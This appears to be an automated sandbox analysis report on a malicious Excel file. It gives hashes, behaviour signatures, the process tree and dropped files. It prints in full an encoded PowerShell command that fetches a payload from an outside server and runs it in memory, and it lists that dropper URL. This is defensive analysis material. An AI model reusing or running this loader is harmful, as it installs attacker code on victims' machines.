Analysis

  • max time kernel
    46s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-11-2024 22:03

General

  • Target

    2d593d80c97bf04124422068c8bcd91070750bd7792eb39926790fbc229589db.xls

  • Size

    46KB

  • MD5

    836c57d347726357d1e67ec4fee4960c

  • SHA1

    79b73aa267a84dcf5fe8cb9b7aad481428f4f5fe

  • SHA256

    2d593d80c97bf04124422068c8bcd91070750bd7792eb39926790fbc229589db

  • SHA512

    edb98a134333a83be3ed49367ad2ea4e5d31c419e5b45840ffa2b804b9c7f2dfd9712ea98fd83831b253b6363f92f77fda7a740bff3aea3d68d1ddb01968b2ef

  • SSDEEP

    768:H4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:YSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2d593d80c97bf04124422068c8bcd91070750bd7792eb39926790fbc229589db.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:464
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2500
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bqhw4gzd\bqhw4gzd.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:912
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0FE.tmp" "c:\Users\Admin\AppData\Local\Temp\bqhw4gzd\CSC4D44F08134B648A4AAA14BDC4AB6D268.TMP"
          4⤵
            PID:4864

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESC0FE.tmp

      Filesize

      1KB

      MD5

      d2d89aa56eba2d6bdb15dc3701e40bdc

      SHA1

      50fbc3374080d4a61097eeb99cbb49a9fd5f3f3b

      SHA256

      8346694fbc8921231e1ba8c26e9cf47e3fed8c0602fd591e74168af49cb792b0

      SHA512

      de600ff101e88e391bb9e10eaca553bc15489441811ffae90fd77face8187a015d8bb320a72885113938bf21ec72de41207a89b44e2f2e4940999cf8d83f5435

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3rltxhn.xdu.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\bqhw4gzd\bqhw4gzd.dll

      Filesize

      3KB

      MD5

      2425c5960111494a2419b6c3f7795f62

      SHA1

      5c344682f9e9456f1c8683c540c9831cdf8a30e3

      SHA256

      1efe4cae14c1e7ae92afe280d7f686e81a10b5ffa22caecb27ca0c1b6b9f68a6

      SHA512

      38756256f3efea68ca74291c56a599d42eb28ab66ccd8d7e07575dc8c555a7e9cf5cf0753812b080b7793509d9386f50cb6e730593c02d28a60a3625d18fe0bc

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

      Filesize

      1KB

      MD5

      158c0dbe4a4cbfb42d5fa60cfbc3708c

      SHA1

      54510d52c559305577c2762043361145a3abbe93

      SHA256

      2422f9e6f57a2fbcbfbf9123be656f1f366e095c285abf3b36ecdb1e9ef5aba5

      SHA512

      fc7213b237ed610ef464d5a6e7d4a8941df823bb9407e4ea4ee7976b3e9f439e5bbd4fe842bd23009cb2b09f15acc3ab678b36a979e9a0098fb7a24e4a0d6f92

    • \??\c:\Users\Admin\AppData\Local\Temp\bqhw4gzd\CSC4D44F08134B648A4AAA14BDC4AB6D268.TMP

      Filesize

      652B

      MD5

      c2b406f88512c5d48b9ee233689ee843

      SHA1

      8f575c2bce35d3e6e9bda0c766fa28e981592d9a

      SHA256

      3b0bf100639b353b4cefa41307b20eae6b065edfa1de4dfd324138c962cd1645

      SHA512

      a97f266df9b8384b74acbc31bd0391f78e7569ff580cb9256ef9131876deaeace8046d7a851da9bdbbc6bdc6c964127a3fe27158ec1a34edb5baef6059c7593e

    • \??\c:\Users\Admin\AppData\Local\Temp\bqhw4gzd\bqhw4gzd.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\bqhw4gzd\bqhw4gzd.cmdline

      Filesize

      369B

      MD5

      7c7d569df8b9725f748cb0bd7e09884a

      SHA1

      78cfa6edfce6744acdce0c60783f48134a5e6bd0

      SHA256

      b570d1611784af4e92ae166dc6d756b80a7071cf50fee6cdcd2ee59955971be4

      SHA512

      e9d2b8151b2628515d3978b6cfd30f587fd0a846343ffbe083d9548fe7ab9313d7e0ad9f6800a5f115cfccaf6621d3d212514d1efb6e95927c24b6e142ace5d8

    • memory/464-5-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

      Filesize

      64KB

    • memory/464-14-0x00007FFF0BC30000-0x00007FFF0BCCE000-memory.dmp

      Filesize

      632KB

    • memory/464-7-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp

      Filesize

      64KB

    • memory/464-6-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp

      Filesize

      64KB

    • memory/464-4-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

      Filesize

      64KB

    • memory/464-0-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

      Filesize

      64KB

    • memory/464-2-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

      Filesize

      64KB

    • memory/464-3-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

      Filesize

      64KB

    • memory/464-48-0x00007FFF0BC30000-0x00007FFF0BCCE000-memory.dmp

      Filesize

      632KB

    • memory/464-1-0x00007FFF0BC30000-0x00007FFF0BCCE000-memory.dmp

      Filesize

      632KB

    • memory/2500-28-0x00000194B66F0000-0x00000194B6712000-memory.dmp

      Filesize

      136KB

    • memory/2500-44-0x00000194B66D0000-0x00000194B66D8000-memory.dmp

      Filesize

      32KB